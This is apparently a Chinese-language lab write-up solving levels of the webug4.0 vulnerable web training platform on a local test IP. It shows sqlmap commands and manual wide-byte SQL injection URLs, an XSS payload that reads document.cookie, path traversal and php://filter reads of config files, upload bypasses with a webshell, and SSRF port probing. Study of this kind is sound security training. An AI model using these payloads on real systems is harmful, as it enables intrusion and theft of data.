webug4.0 后面持续更新

前三关简单测试了一下，感觉很简单就直接用sqlmap跑了
第四关：post注入
打开网站
在搜索框中输入‘，之后报错
用bp抓包之后保存在本地

直接用sqlmap跑，跑数据库
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 --dbs --batch
表名
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug --tables --batch

字段名
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug -T flag --columns --batch

值
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug -T flag -C flag --dump --batch
第五关
和第四关差不多直接用sqlmap跑就行
第六关：宽字节注入
由于是款字节注入
打一个%df试试

发现存在注入点，可以手工注入
1、判断列数：
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 1%23
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 2%23
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 3%23
order by 3 时报错，说明只有两列。
2、库名：
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2 union select 1,database()%23

3、表名：
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2
union select ,1,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23
4.字段
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2 union select 1，group_concat(column_name)
from information_schema.columns
where table_name=webug and table_schema=database()%23
sqlmap:
数据库
sqlmap -u http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 --dbs
表：
sqlmap -u http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 -D webug --tables
后面就是重复步骤了
第7关
输入admin之后发现
查看服务版本

<?xml version="1.0"?>

]>

&content;

测量半天找不到其他的，查看源码发现有一个payload，然后解压之后发现在d盘有一个1.txt，但是我没有d盘，直接在c盘下面建立一个1.txt
直接写入xxe代码爆出flag

<?xml version="1.0"?>

]>

&content;

第9关 反射xss
最好不要在谷歌浏览器里面加载，它有自己检测。
这关没有过滤，构造就可以了

第13关 过滤xss
构造语句，发现被过滤了
试了大小写，也是一样被过滤了
然后试<img src=1 οnerrοr=alert(document.cookie)>这个一下就爆出flag
第14关 链接注入
看题目是链接注入
直接构造<a%20href=“https://www.baidu.com”>asads试试
发现可以跳转的百度
第15关

可以抓包看路径，也可以在页面审查看路径，我是抓包
然后
修改路径，下载其他的比如boot.ini
?file=…/boot.ini
第16关
和上关差不多，构造语句下载mysql配置文件
第17关 文件上传（前端拦截）
上传一个.php文件马上就拦截
1，修改前端代码绕过
2，burp抓包改包

为了简单直接写一句话，
上蚁剑
在里面找flag就可以了

第18关 文件上传(解析漏洞)
首先设置一下版本

然后访问

解释一下该解析漏洞，php配置文件中有一个关键选项cgi.fi:x_pathinfo这个选项在某些版本默认是开启的，当访问不存在的文件时，php会向前递归解析
抓包写入木马上传，可以修改后缀名，直接是jpg
访问该文件不存在的php
第二种可以用中文绕过

访问该路径
第19关 文件上传(畸形文件)

测试了一下大小写，%00截断等绕过，
当测试双写的时候可以

第20关 文件上传(截断上传)

这关是截断，首先想到的是%00截断，但是试了很久，发现很奇怪，看了一下源码

最后突然想到了中文绕过，试了一下居然可以

第21关 文件上传(htaccess)
打开之后还是一个上传文件的界面

这关估计是作者搞错了，正常的图片都不能上传上去，而且还禁用了htaccess这个后缀名，为了能做这关修改了一下源码
然后还将黑名单中的.htaccess去掉
传一个正常的文件试试
由于是考的htaccess，所以可以直接上传一个空的jpg文件在添加内容，修改文件名
上传一个qw文件

然后直接访问该文件的就可以直接访问qw就可以

第22关 越权修改密码

登陆进去之后是一个修改密码界面
有一个id=1，为了演示
然后修改id=2
成功越权修改
第23关 支付漏洞

抓包改价格

第24 邮箱轰炸

第25 越权查看admin
登陆进去是一个
修改id的值将id改成2
第26关 URL跳转
右上角有一个按钮点击可以跳转
F12之后可以看到一个url链接

第27关 文件包含

http://192.168.59.128/control/more/file_include.php?filename=php://filter/convert.base64-encode/resource=…/…/index.php
解码就可以看到index.php源码了
第29 webshell爆破
有些时候，有些黑客已经入侵了某网站，然后在该网站留下了后门，我们可以通过网站目录扫描得到该网站后门地址，由于不知道该密码所以需要爆破
抓包
加载字典
跑出来了密码是a1
登陆进去之后就是如下界面，搭上了一个顺风车直接拿shell

第30关 ssrf
查看win的基本配置文件
查看系统版本

直接使用http://192.168.59.128/control/more/ssrf.php?url=http://192.168.59.128:22来探测22端口是否开放